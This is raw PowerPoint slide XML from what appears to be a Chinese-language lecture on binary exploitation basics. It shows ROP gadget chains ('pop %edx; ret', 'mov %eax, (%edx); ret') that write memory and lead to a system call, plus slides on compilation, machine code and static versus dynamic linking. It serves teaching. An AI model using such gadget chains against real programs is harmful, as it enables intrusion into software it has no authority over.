                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB83BC1-A83C-4665-AF91-093EA999F710}"/>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Shape 1614"/>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15" name="Shape 1615"/>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value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1616" name="Shape 1616"/>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617" name="Shape 1617"/>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0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1618" name="Shape 1618"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>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pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1619" name="Shape 1619"/>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620" name="Shape 1620"/>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621" name="Shape 1621"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="2865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22" name="Shape 1622"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="3069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23" name="Shape 1623"/>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24" name="Shape 1624"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1623" idx="0"/>
            <a:endCxn id="1618"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25" name="Shape 1625"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1618" idx="0"/>
            <a:endCxn id="1619"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26" name="Shape 1626"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1619" idx="0"/>
            <a:endCxn id="1620"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27" name="Shape 1627"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1614" idx="1"/>
            <a:endCxn id="1618"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28" name="Shape 1628"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1616" idx="1"/>
            <a:endCxn id="1619"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29" name="Shape 1629"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1617" idx="1"/>
            <a:endCxn id="1620"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30" name="Shape 1630"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="3254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31" name="Shape 1631"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="3459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32" name="Shape 1632"/>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%edx = value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1633" name="Shape 1633"/>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5" name="矩形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D761A85A-D3BF-4345-9335-EB32FAE54EE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4" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF70847-1139-4140-A2C8-8DD44EF5DE69}"/>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9" name="Shape 1639"/>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40" name="Shape 1640"/>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41" name="Shape 1641"/>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42" name="Shape 1642"/>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43" name="Shape 1643"/>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44" name="Shape 1644"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="32242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xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1645" name="Shape 1645"/>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mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1646" name="Shape 1646"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="21538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47" name="Shape 1647"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="23586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48" name="Shape 1648"/>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49" name="Shape 1649"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1648" idx="0"/>
            <a:endCxn id="1643"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50" name="Shape 1650"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1643" idx="0"/>
            <a:endCxn id="1644"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51" name="Shape 1651"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1644" idx="0"/>
            <a:endCxn id="1645"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52" name="Shape 1652"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1639" idx="1"/>
            <a:endCxn id="1643"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53" name="Shape 1653"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1641" idx="1"/>
            <a:endCxn id="1644"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54" name="Shape 1654"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1642" idx="1"/>
            <a:endCxn id="1645"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55" name="Shape 1655"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="2442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56" name="Shape 1656"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="2646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57" name="Shape 1657"/>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58" name="Shape 1658"/>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59" name="Shape 1659"/>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6" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABBB589C-512D-4FE0-BA5C-C41D69DB67F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5" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E913141E-802B-42B5-8306-4FDB9A8CEA44}"/>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5" name="Shape 1665"/>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66" name="Shape 1666"/>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67" name="Shape 1667"/>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68" name="Shape 1668"/>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69" name="Shape 1669"/>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70" name="Shape 1670"/>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xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1671" name="Shape 1671"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>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mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1672" name="Shape 1672"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="1341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73" name="Shape 1673"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="1545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74" name="Shape 1674"/>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75" name="Shape 1675"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1674" idx="0"/>
            <a:endCxn id="1669"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76" name="Shape 1676"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1669" idx="0"/>
            <a:endCxn id="1670"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77" name="Shape 1677"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1670" idx="0"/>
            <a:endCxn id="1671"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78" name="Shape 1678"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1665" idx="1"/>
            <a:endCxn id="1669"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79" name="Shape 1679"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1667" idx="1"/>
            <a:endCxn id="1670"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80" name="Shape 1680"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1668" idx="1"/>
            <a:endCxn id="1671"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81" name="Shape 1681"/>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82" name="Shape 1682"/>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83" name="Shape 1683"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="1900133"/>
            <a:ext cx="3050000" cy="409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*(int *)value = 0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1684" name="Shape 1684"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207373" y="2104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85" name="Shape 1685"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310107" y="1900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sp>
        <p:nvSpPr>
          <p:cNvPr id="1686" name="Shape 1686"/>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1687" name="Shape 1687"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2849733" y="1900133"/>
            <a:ext cx="30500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8" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D278550D-848D-45BC-BEB4-45E8FD539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7" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B214AF52-0E71-4BCF-ABCE-8A6160771637}"/>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49319" y="581081"/>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9631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48" y="2093056"/>
                <a:ext cx="1363200" cy="32554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Libc</a:t>
                </a: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18605"/>
                <a:ext cx="1363200" cy="4754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605876"/>
              <a:ext cx="5738969" cy="490143"/>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88324" y="1295909"/>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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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49322" y="1538342"/>
            <a:ext cx="5" cy="4450368"/>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49325" y="4517002"/>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6" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649321" y="5415762"/>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49320" y="5678933"/>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49321" y="5920495"/>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32341" y="5483977"/>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74715" y="5483977"/>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74706" y="5483977"/>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74706" y="5746138"/>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D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10888324" y="5536852"/>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Text</a:t>
            </a:r>
            <a:endParaRPr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的地址，最终调用目标系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="连接符: 肘形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477981EA-3FE8-461E-A6E5-DCAFADB62AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="8081575" y="3292548"/>
            <a:ext cx="4949875" cy="11"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 76"/>
              <a:gd name="adj2" fmla="val 2147483646"/>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DDFD6823-6E38-485F-9740-4B2AEF44C443}"/>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9004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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A9E4A5D-AFFC-48AE-A4BF-D19AF8E3AC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466716"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lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov eax, [ebp+12]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add eax, [ebp+8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A9693D-1A5B-4E5E-A51B-AAAE2A96A437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894987" y="2943504"/>
            <a:ext cx="2861362" cy="139302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stCxn id="17" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3756349" y="3640015"/>
            <a:ext cx="710367" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB1B5CA-FB55-4D09-B1BA-24B7D423A926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8068305"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0x55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0x89 0xe5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0x8b 0x45 0x0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>c</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0x03 0x45 0x08</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0x5d</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0xc3</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Shape 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA7EC1F-EDA0-42B3-9853-FEC56994CB6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7328078" y="3640015"/>
            <a:ext cx="740227" cy="0"/>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3788367"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编译</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1425BF80-ADC1-427F-88F8-0CA6C2DBA40A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7375026"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汇编</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87B1B5B-680F-4CD7-9FDB-067A58F33529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700336" y="2311734"/>
            <a:ext cx="125066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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B1FB94A-3449-48EE-9A65-7C197BEFA80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343399" y="23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汇编代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA4EC2B-5DE8-4CDB-9668-972EE44380FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9060404" y="2311734"/>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机器码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6D9012-0DE0-4CBE-80CE-346D7414356C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4561114"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57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2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8B9137-02AB-4718-89EF-4573CC640443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439229" y="1686143"/>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动态链接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{109FE739-503F-4113-95FC-6C3E8B44FBCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458033" y="168614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静态链接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4605FF71-7FA8-4A4D-A909-C396BBB6D83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602187" y="2479254"/>
            <a:ext cx="5089855"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程序装载进入内存时加载库代码解析外部引用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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1C6DAE71-9F57-4E68-B9B5-87B74DC70785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6390159" y="2479254"/>
            <a:ext cx="555152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202122"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>链接器在编译链接时将库代码加入到可执行程序中</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169C472C-1EB6-4548-9412-70BC54B5610C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2965825" y="4290970"/>
            <a:ext cx="666079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编译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汇编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链接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装载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执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2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A54F0E62-E3B9-4D58-B0A4-2793167A522B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439229" y="4752635"/>
            <a:ext cx="6662401"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汇编代码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目标文件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可执行文件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进程映像</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">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1AEFF90A-F9BB-4633-BB34-63831C427E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3147115" y="2848586"/>
            <a:ext cx="4580209"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7ACA1BA0-9CA8-4453-A8A5-5A6C8AE8D784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6296224" y="2848586"/>
            <a:ext cx="2869695"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矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46D01AF8-E213-4DCE-B9C5-8B2A6B3EA66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title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1487488"/>
            <a:ext cx="2717800" cy="636587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>动态链接相关结构</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Shape 818"/>
          <p:cNvSpPr/>
          <p:nvPr/>
